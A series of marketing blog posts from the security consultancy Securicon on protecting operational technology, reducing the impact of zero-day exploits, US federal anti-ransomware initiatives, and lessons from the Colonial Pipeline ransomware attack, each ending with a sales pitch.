How to Protect Your Operational Technology (OT) in 2023

OT Security
OT Security

Oil and gas, manufacturing, energy distribution and critical infrastructure – what do all these industries have in common? Aside from their indispensability, they all rely on operational technology (OT) such as industrial control systems (ICS) and supervisory control and data acquisition (SCADA) devices.  

Collectively, these technologies control the world we live in, and OT-directed attacks can have a devastating impact. In contrast to traditional Information Technology based attacks, these Cyber-Physical attacks affect machinery and processes that have real world impacts to the industries and people they serve. 

In 2021, we were reminded of this fact by the Colonial Pipeline attack, which nearly crippled gas supplies across the Eastern U.S. More recently, 9 out of 10 organizations reported that cyberattacks impacted their production or energy supplies within the last 12 months, with 56% seeing disruption lasting 4 days or longer. 

Thanks to a combination of factors, OT-directed attacks – and traditional cyberattacks that impact OT systems – are steadily increasing, with government agencies increasingly taking notice. But why is this happening and how can you protect yourself in 2023? In this article, we’ll answer both questions. 

OT Security Trends 

OT threats have been on the rise for years, and while the factors behind this rise have largely remained consistent, they are being accelerated by larger trends affecting the IT landscape and business world in 2023.

1. OT Talent Gap

With the need for cybersecurity talent growing faster than the supply, ISC2 reported that global organizations were facing 3.4 million unfilled cyber positions in 2022.  

This gap continues to impact OT worse than other fields, as OT environments are filled with a combination of specialized and legacy systems. According to one expert, there were fewer than 1,000 ICS cybersecurity experts around the world only five years ago, and improvements have not kept pace with OT threats.

2. Supply Chain Issues Driving IT/OT Convergence

IT and OT have been converging for long enough that SANS Institute recommended dropping the IT/OT nomenclature several years ago: today’s industrial environments are dependent on IT infrastructure, which makes OT systems vulnerable to IT-directed attacks.  

With continued supply chain issues and economic downturn projected in 2023, organizations are being pushed to maximize efficiency, meaning an influx of industrial IoT (IIoT), cloud apps and other Internet-facing surfaces that drive OT threats.

3. Geopolitical Conflict

Given the critical role that OT plays in supporting national industry and infrastructure, it is a common target for nation-state actors and politically motivated advanced persistent threat groups (APT) groups.  

According to one study, hacking and reconnaissance against government bodies accounted for 48% of Internet traffic monitored across all public-sector organizations in 2022. As geopolitical conflict increases around the world, politically motivated cyberattacks of all types can be expected to rise even higher.

4. OT-Directed Attacks

In the past, OT threats have tracked IT threats closely, with many OT security incidents occurring as a side effect of malware or traditional cyberattacks. Now, threat actors are increasingly optimizing their attacks for ICS and SCADA devices, including systems from specific manufacturers.  

Last April, the Cybersecurity and Infrastructure Security Agency (CISA) issued a joint advisory with several federal agencies warning that APT groups had developed a malicious ICS framework known as “PIPEDREAM,” tailored for devices found throughout OT environments. 

The Impact of OT Threats 

Attacks on control systems can accomplish many things, none of them good. Limiting the scope of risk to those that directly impact an organization, they include: 

  • Data theft – exposing operationally significant data to intruders and leaking proprietary information like intellectual property. 
  • Operational disruption – leading infrastructure to function improperly or even shut down. This may cause significant risk to human life and safety within operating facilities. 
  • Financial loss – with the rise of ICS ransomware, an OT attack can directly rob an organization. Beyond that, the cost to remediate any incident may be high, and extended periods of disruption can cause a loss in revenue. 

Beyond an organization’s people and bottom line, it goes without saying that OT systems control a nation’s infrastructure meaning that any security incident can potentially affect millions of lives for the worst. 

Protecting Your OT Systems 

Faced with the prospect of cyberattacks on critical infrastructure, the government is focusing more attention on OT than ever before. It is only a matter of time before businesses – particularly government contractors – are required to follow regulations to protect their OT systems. But there’s no reason they can’t start now.

1. Adopt ICS Security Frameworks

With IT-directed attacks still accounting for a large number of OT threat incidents, securing your IT and network perimeter is a first step towards protecting OT. Organizations can start by complying with standards like the National Institute of Technology (NIST)’s Cybersecurity Framework (CSF) 

They can also implement guidelines developed specifically for industrial environments, such as the North American Electric Reliability Corporation (NERC) Critical Infrastructure Protection (CIP).

2. Treat OT as a Separate Domain

Despite IT and OT convergence, organizations are increasingly shifting the primary responsibility for OT security from IT managers to OT operators. As a SANS Institute survey reports: “organizations are realizing the enterprise IT and ICS/OT environments are not the same. They not only have different types of systems, but also have technologies that are not directly cross-compatible.”  

Ultimately, increased communication between IT and OT professionals can help to bridge knowledge gaps. While 72% of cybersecurity professionals can’t tell whether a disruption originated from IT or OT, a much larger number of professionals with a combination of IT and OT expertise can.

3. Promote More Secure Authentication

Poor identity management and authentication practices – such as weak passwords and lack of two-factor authentication – continue to threaten systems within an OT environment and on the periphery.  

Now more than ever, it’s vital for organizations to educate their employees on the importance of secure passwords, and update applications with most-secure configurations, which may include 2FA and support for biometrics.

4. Develop an Incident Response Strategy

In the event of a successful OT attack, organizations can mitigate harm significantly by developing a robust incident response strategy. In summary, the plan should include steps to: 

    • If possible, isolate the affected systems to prevent further harm, identify the threat source and remove it. 
    • Record and document an ongoing attack for later analysis and review. 
    • Reduce harm by resetting affected systems’ passwords and user profiles. 
    • Inform stakeholders and implement measures to prevent future incidents. 
  • During an attack, every second counts and knowing what to do ahead of time can make a world of difference. For more detail, check out our blog post on disaster recovery and response. Additionally, consider joining industry organizations such as Incident Command System for Industrial Control Systems (ICS4ICS), which focuses on an OT based emergency management framework.   

The Need for Expertise 

When it comes to defending against OT attacks, no method of security is more reliable than proactive risk management, threat hunting and vulnerability assessment conducted by experts at the intersection between IT and OT. 

Unfortunately, experts are hard to come by, especially for ICS, SCADA, programmable logic controllers (PLCs) and other OT systems. Fortunately, many are employed by Securicon. With years of experience with critical infrastructure – and the ability to implement NERC CIP guidelines – no one is better equipped to find vulnerabilities and promote safety in modern OT systems. To learn more, contact us today. 

Seven Ways to Reduce the Impact of Zero-Day Exploits

Reducing the impact of zero day exploits
Reducing the impact of zero day exploits

At the end of 2021, the Log4Shell remote code execution (RCE) exploit was discovered in a popular Java logging package, Log4j. With millions of devices and software packages affected, it became the worst cybersecurity vulnerability since the SolarWinds attack, with attacks continuing into the early months of 2022.

Log4Shell is an example of a zero-day exploit: zero-days are vulnerabilities exploited by malicious cyber actors immediately after they are discovered in devices and software products. The term “zero-day” is a reference to the number of days organizations and cyber defenders have to prepare – zero.

As cyber actors increase in sophistication, the number of zero-day exploits is increasing every year. In 2021, Mandiant found that the number of zero-days had doubled since 2019. In this article, we’ll explain where zero days are most likely to originate, and how businesses can protect themselves from harm.

Common Types of Zero-Days

Since zero-days are code-based vulnerabilities that allow remote actors to hijack devices and applications, any Internet-connected, programmable surface is susceptible to zero-day exploits. Today, common targets include:

  •  Third-Party Software – third-party applications are frequently built on top of dependencies that can suffer from zero-day exploits. Since Log4Shell targeted a component in Apache Logging Services, millions of apps which depend on Apache were impacted.
  • Web Browsers – every day, Internet users spend up to 6 hours of their day online – this makes Web Browsers like Edge, Chrome and Firefox common targets for malicious actors seeking zero day exploits. In 2022 alone, Google has patched seven zero-days in the Chrome browser.
  • Mobile Operating Systems – compromised mobile devices are a great source of sensitive data which makes them a major target for nation-state actors. Zero-day exploits often surface in iOS, Android and other mobile operating systems; worse, they can go undiscovered for years before they are patched.
  • Network Edge Devices – routers and switches regularly fall victim to zero days which enable cyber actors to bypass protocols and WPA encryption. In 2018, 83% of home and enterprise routers were found to possess publicly known vulnerabilities, and today, these devices are also a favorite target for ransomware attacks.

As organizations grow more reliant on information technology (IT), the threat of zero day exploits will continue to rise – the average business deploys over 100 software-as-a-service (SaaS) apps, and at least as many connected devices. Now more than ever, businesses need to take preventive steps to protect themselves from vulnerabilities.

Reducing the Impact of Zero-Day Exploits

The danger of a zero-day exploit is exacerbated by the fact that cyber defenders cannot detect its presence based on Common Vulnerabilities and Exposures (CVEs) or attack signatures. Fortunately, there are ways to reduce the likelihood of a zero-day exploit and increase your attack preparedness.

  1. Threat Detection Systems – aside from basic cyber defenses – such as firewalls and anti-virus – organizations should adopt real-time protection in the form of inline intrusion-prevention systems (IPS). An IPS system can use network intelligence to detect signs of intrusion even if it cannot detect the specific type of attack, alerting your team if a zero-day exploit is used.
  2. Egress Filtering – while filtering inbound traffic is crucial, filtering outbound traffic is equally important. This is possible with egress filtering, which can be implemented through a firewall or intrusion prevention system (IPS), enabling network admins to prevent applications on your network from reaching out to certain destinations or using unsafe protocols.
  3. Network Visibility – security teams often have limited visibility into the devices and applications that are operating across their networks. Bringing this fragmented knowledge together is essential for securing your network from exploits: keep an inventory of every device, whether IT, IoT or OT, classify and continually monitor them for configuration changes.
  4. Device Oversight – devices – including routers, switches, laptops and mobile phones – typically receive regular updates that patch zero-days when they are discovered by the malware researchers. Organizations should maintain an up-to-date inventory of all the devices connected to their network, set update policies, and replace devices that are no longer supported by the manufacturer.
  5. Third-Party Vendor Management – while no vendor can guarantee that their devices or software products won’t fall prey to a zero-day exploit, some vendors are more security conscious than others. Take inventory of your software supply chain, and research all your technology partners to ensure they are applying adequate security controls.
  6. Adopt a Zero-Trust Paradigm – when malicious actors compromise your network through a zero-day exploit, they will try to move laterally to other systems. A zero-trust security paradigm can stop them in the process by applying the principle of least privileges, and constantly verifying a user’s identity as they switch between devices and applications.
  7. Vulnerability Assessmentvulnerability assessments and penetration tests can help you to better document your IT infrastructure and remediate security gaps that increase the impact of zero-day exploits.While there’s no way to eliminate the chance of a zero-day exploit altogether, developing a strong cybersecurity program can give your business the tools it needs to close cybersecurity gaps, eliminate risky vendors, and respond quickly in a disaster. 

Partner With Cybersecurity Veterans

In today’s perilous cyber landscape, organizations need expert cybersecurity consultants to help them find and identify risks to their mission-critical assets. But with a worldwide shortage of cyber talent, finding experts has become increasingly difficult – fortunately, Securicon is here to help.

With a team comprised of veterans from the U.S security community – including DoD, DHS and the U.S Cyber Command – we are equipped to prepare your organization for the worst, from gap analysis to compliance consulting, assessment support and audit preparation. To learn more, contact us today.

What the Federal Government is Doing to Fight Ransomware in 2022

ransomware
ransomware

Among the cybersecurity threats that are escalating in 2022, ransomware attacks remain one of the most damaging and impactful to federal agencies and contractors. According to Verizon’s yearly Data Breach Investigation Report (DBIR), this year has seen ransomware incidents increase by 13%, which is more growth than the past 5 years combined.

The cost of ransomware is high, with many cyber actors embracing a double extortion model which extracts twice the payment from their victims – but cost is far from the biggest concern for the U.S government. Foreign adversaries – including China, North Korea, and Russia – are increasingly using ransomware against organizations in the West: sometimes, they even work together.

Government Initiatives and New Security Burdens

With all that being said, ransomware is a risk that organizations in the public and private sectors should be worried about: not only is it capable of driving businesses into bankruptcy, but it also represents a national security threat that can cripple critical infrastructure and expose classified information to nation state actors.

Fortunately, 2022 has also brought multiple initiatives across agencies and branches of the U.S government which will help curb the incidence of ransomware and keep businesses safe for years to come. Some will also impose new security burdens which government contractors will have to apply if they want to stay compliant.

In this blog post, we will share five recent developments in legislation and policy while explaining their implications for ransomware and compliance.

1.  New Cyber Reporting Requirements

In the aftermath of a cyber incident or data breach, organizations have an ethical responsibility to inform their customers – sadly, that doesn’t always happen in a timely matter. But when a ransomware attack occurs against critical infrastructure, public safety is at stake, and rapid disclosure is all the more urgent.

In March, the ‘Cyber Incident Reporting for Critical Infrastructure Act of 20221 (CIRCIA) was passed into law – under CIRCIA, critical infrastructure companies will be required to report any substantial cybersecurity incidents within 72 hours, and any ransom payments within 24. While the precise scope of covered entities remains to be determined, it will likely include sectors like:

      • Critical Manufacturing
      • Financial Services
      • Energy
      • The Defense Industrial Base (DIB)

Ultimately, the new cyber reporting requirements will help law enforcement agencies to gather intelligence on attack patterns, track the activity of advanced persistent threat (APT) groups and respond to cyber emergencies in a timely way.

1 The official source for CIRCIA is the Consolidated Appropriations Act of 2022; for readers’ convenience, the PDF linked above contains only the portions of the Act which comprise CIRCIA.

2.  The Joint Ransomware Task Force

Within the text of CIRCIA, legislators proposed the formation of a ransomware task force, which was formally announced by Cybersecurity and Infrastructure Security Agency (CISA) director Jen Easterly on the 20th of May.

The task force – which aims to combine cybersecurity initiatives across multiple U.S agencies – will be co-headed by the Federal Bureau of Investigation (FBI), allowing law enforcement to collaborate with CISA more effectively.

Today, government agencies suffer from entrenched barriers to information sharing that hinder cybersecurity efforts. Better collaboration will be a major boon, allowing agencies to share and react to intelligence more quickly while building attack profiles that will help businesses to defend themselves against advanced ransomware strains that evade popular detection methods.

3.  CMMC 2.0 and Updated CMMC Timeline

Following the release of Cybersecurity Maturity Model Certification (CMMC) 2.0, the Department of Defense (DoD) is now working with federal policymakers on an implementation timeline that could see CMMC enforced on DoD contracts by May of 2023.

CMMC 2.0 seeks to protect controlled unclassified information (CUI) by requiring federal contractors to undergo third-party assessment for cybersecurity compliance before they can be eligible for most Defense contracts. For less sensitive “Level 1” contracts, the DoD will accept self-assessment – for more sensitive “Level 3” contracts, organizations will need a more official government assessment.

By enforcing cybersecurity controls proportional to the sensitivity of each contract, CMMC 2.0 will not only encourage better security throughout the DIB – it will also ensure that the most sensitive CUI is only shared with contractors who are ready to defend it against a variety of threats, including ransomware.

4.  Zero-Trust Legislation and Implementation

In 2021, the ‘Executive Order on Improving the Nation’s Cybersecurity’ instructed federal agencies to adopt zero-trust security models to defend their IT infrastructure. Shortly afterwards, CISA and the Office of Management and Budget issued documents outlining a zero-trust maturity model (ZTMM) to help agencies comply with the executive order.

The road ahead is difficult, especially with many federal organizations still relying on outdated, legacy IT architecture. But zero-trust adoption is well underway, and – difficulties notwithstanding – 6 out of 10 federal IT officials believe their agencies will be able to meet the challenge. More than 75% say they already have some form of zero-trust security policy in place.

From the perspective of reducing ransomware attacks, this is good news: zero-trust architecture won’t render organizations invulnerable to cyberattacks, but it will bring about significant transformation by forcing organizations to continually validate user identities, monitor apps, and accelerate modernization.

Most importantly – with zero-trust in place – it won’t be enough for ransomware actors to “get past the door”: they will be faced with multiple barriers to lateral movement and penetration that will halt many in their tracks.

5.  Updates to NIST’s Cybersecurity Framework (CSF)

The National Institute for Standards and Technology (NIST) is updating its cybersecurity framework (CSF), a set of standards that have guided cybersecurity efforts in both the public and private sectors since it was first issued in 2014. In February of this year, NIST requested comments for an upcoming update to CSF, prompting an outpouring of responses from industry experts.

Recently, DoD sources have stated that they want better risk-management guidance in the next version of the CSF framework, to align it with another NIST special publication (SP), 800-30, ‘Guide for Conducting Risk Assessments’. Aligning the two NIST resources would help organizations who are currently following CSF to develop a better understanding of risk and risk factors that lead to data breaches, ransomware attacks, and more.

Whether NIST implements this advice or not, an update to CSF could not come at a better time – cyber tactics have developed rapidly since the last update was released in 2018, and organizations are in need of guidance. According to the agency, a majority of respondents to its request for comment stated they find CSF to be a “useful model for organizations seeking to identify, assess, address, and manage cybersecurity risk” – it can only remain useful as long as it remains up to date with leading risk sources.

Cyber Expertise to Help You Stay Compliant

Compliance with federal cybersecurity standards and laws are non-negotiable for any businesses in the federal space, and a very good idea for businesses outside it. But the cyber landscape changes, protecting revenue and customers demands a steadily rising cybersecurity baseline that can be hard to meet without guidance.

Securicon helps your business to comply with Federal and regulatory requirements through program and risk assessments. With a team comprised of veterans from the U.S security community – including DoD, DHS, and the U.S Cyber Commands – we are equipped to provide organizations with gap analysis, compliance consulting, assessment support, and audit preparation. To learn more, contact us today.

Right-of-Breach Mentality Leads to Cyberattacks on Critical Infrastructure

The dust is still settling from the latest in a series of highly publicized cyberattacks affecting critical infrastructure in the U.S. Two Fridays ago, Colonial Pipeline – the single largest provider of natural gas across the Eastern U.S – experienced a ransomware attack and announced that it was shutting down all 5,500 miles of its main pipeline, running from Houston, TX to Linden, NJ.

The news prompted a fearful response from consumers. Because Colonial Pipeline supplies 45% of gas, jet fuel and diesel across the East Coast, prices soared above $3.00 a gallon in some places, and gas stations experienced shortages as customers piled up to buy as much as they could. Since then, the pipeline has resumed operations and the cost of gas has slowly gone back down.

In retrospect, things could have been much worse.

According to Colonial Pipeline, the cyberattack affected its business networks rather than the industrial control systems connected to its delivery infrastructure. And thanks to a reserve supply, wholesalers serving retail customers did not report any shortages before the pipeline resumed operation. Even so, this incident serves as a stark reminder of the cyber war that is unfolding all around us and the risk it poses to national security.

Ransomware Attacks on the Rise

In August of 2020, CISA warned of a rise in cyberattacks against critical infrastructure and advised operators to take immediate action. Since then, their predictions have materialized in at least two major security incidents, including the SolarWinds breach in December and the breach of a Florida water treatment facility in February. According to one source, ransomware attacks rose by 62% in 2020, with ransom demands rising 225%.

Why is this happening? For one thing, bad actors are becoming more sophisticated. According to analysts, the Colonial Pipeline attack was an instance of “ransomware-as-a-service”. DarkSide – the Russia-based hacking group who claimed responsibility for the incident – provides its code to lower-level hackers and helps with execution in exchange for a cut of the profit.

But more importantly, organizations are not applying CISA’s recommendations until it is too late. They aren’t taking inventory of their assets, implementing a robust cybersecurity plan or enforcing access rules that would prevent a majority of attacks from succeeding.

Right of Breach Mentality

While the cause of the Colonial Pipeline attack has not yet been disclosed, recent high-profile security breaches have precipitated from notoriously bad cybersecurity practices. For instance, a SolarWinds update server was protected by a weak password (Solarwinds123); meanwhile, the Florida water facility lacked any user authentication mechanism to prevent unauthorized remote access.

But this does not prove that organizations are incapable of better cybersecurity practices. According to a study from Ponemon Institute, companies that experience a security breach are 26% less likely to experience another breach in the future. This research proves what we already know: organizations react “right of breach,” waiting for the worst to happen before they act to prevent it.

Until then, they cheat regulations in dozens of tiny ways that add up to a weak overall cybersecurity position, from skipping double authentication to creating loopholes in their own remote access rules. Many assume they are either too big and sophisticated to fail, while others assume they are too small to fall under an attacker’s radar. Both are mistaken.

Nobody is Safe

In 2020, 1,600 security breaches were reported to the North Carolina Department of Justice, and most of them were not large enough to make any headlines. During the SolarWinds attack, over 18,000 organizations were infiltrated, including 425 companies on the Fortune 500 list. Victims ranged from federal, state and local governments to critical infrastructure entities and small businesses.

Today, there is a bad actor for every organization, and all are looking for a niche. Some are motivated by geopolitics, and some are in it for the money. Others are simply agents of chaos looking for any opportunity to cause destruction. At the end of the day, every organization will eventually fall victim to a cyberattack: it is not a matter of “if,” but “when.”

These organizations should take the threat of a breach seriously for the good of their customers, shareholders and employees. Federal contractors and critical infrastructure entities have an additional burden: they must do it to protect national security and the American way of life.

Preparing for Ransomware Attacks: CISA’s Advice

Following the Colonial Pipeline breach, CISA has once again issued a warning to critical infrastructure operators in publication AA21-131A, titled: ‘Best Practices for Preventing Business Disruption from Ransomware Attacks’. In the following paragraphs, we summarize the most important recommendations:

Reducing the Risk of a Breach

Organizations can reduce the likelihood of a successful ransomware attack by applying security controls that protect against common attack vectors.

  • Prepare for phishing attacks – phishing and spearphishing are among the most common methods of hacker reconnaissance. Train your employees to recognize and avoid compromised emails through simulated attacks; enable strong SPAM filters to prevent phishing emails from reaching them.
  • Protect against bad connections – block traffic from known bad IP addresses, and protect against malicious entry attempts by restricting remote desktop protocol (RDP) access. Additionally, block traffic from TOR exit nodes and other anonymization services.
  • Prevent unauthorized execution – prevent unauthorized programs from running on organization computers by disabling macro scripts in Microsoft office files (PDFs, documents, etc.); use allowlisting so only trusted apps and dependencies can operate.

Protecting Business Functions

Should a ransomware attack occur, the following protections and redundancies will ensure that critical business functions can continue.

  • Segment IT/OT networks – regulate communication between operational technology (OT) and information technology (IT); minimize network connectivity to industrial control systems (ICS) and Supervisory control and data acquisition (SCADA) devices.
  • Prepare for manual control – ensure you can switch to manual operation if necessary. Find and disable IT dependencies in the event of a cyberattack; conduct exercises to test manual controls on a regular basis.
  • Conduct regular backups – regularly back up system data and store it separately from the rest of your network. Create backup images of critical systems so they can be rebuilt from scratch if necessary.

Worst Case Scenario

If the worst should come to pass, have an emergency plan to protect the rest of your organization and mitigate damage from attackers.

  • Isolate infected system – immediately identify infected devices, power them down and remove them from your network.
  • Disable devices – power-off and segregate unaffected systems that are on the same network as infected devices. Do not allow them to communicate.
  • Secure your backups – your backups are your last line of defense. Make sure they are offline and secure; scan to ensure they have not been compromised by attackers.

In the hours after a data breach is discovered, an organization’s actions are critical. For more preparation and emergency response strategy, see our blog post: How to Survive a Data Breach: 14 Disaster Response Tips.

Harden Your Organization

While it appears that Colonial Pipeline made several mistakes leading up to the recent ransomware attack, the company did one thing right: it reacted quickly by taking critical systems offline and partnering with a third-party firm to investigate the incident and prevent future attacks.

Moving forward, critical infrastructure operators cannot afford to ignore the threat of ransomware. As cyber-actors advance, your organization is a target. With years of ICS expertise trusted by the U.S security community – including DoD, DHS and the U.S Cyber Command – Securicon can harden you against today’s risks and prepare you for tomorrows threats. Contact us to learn more.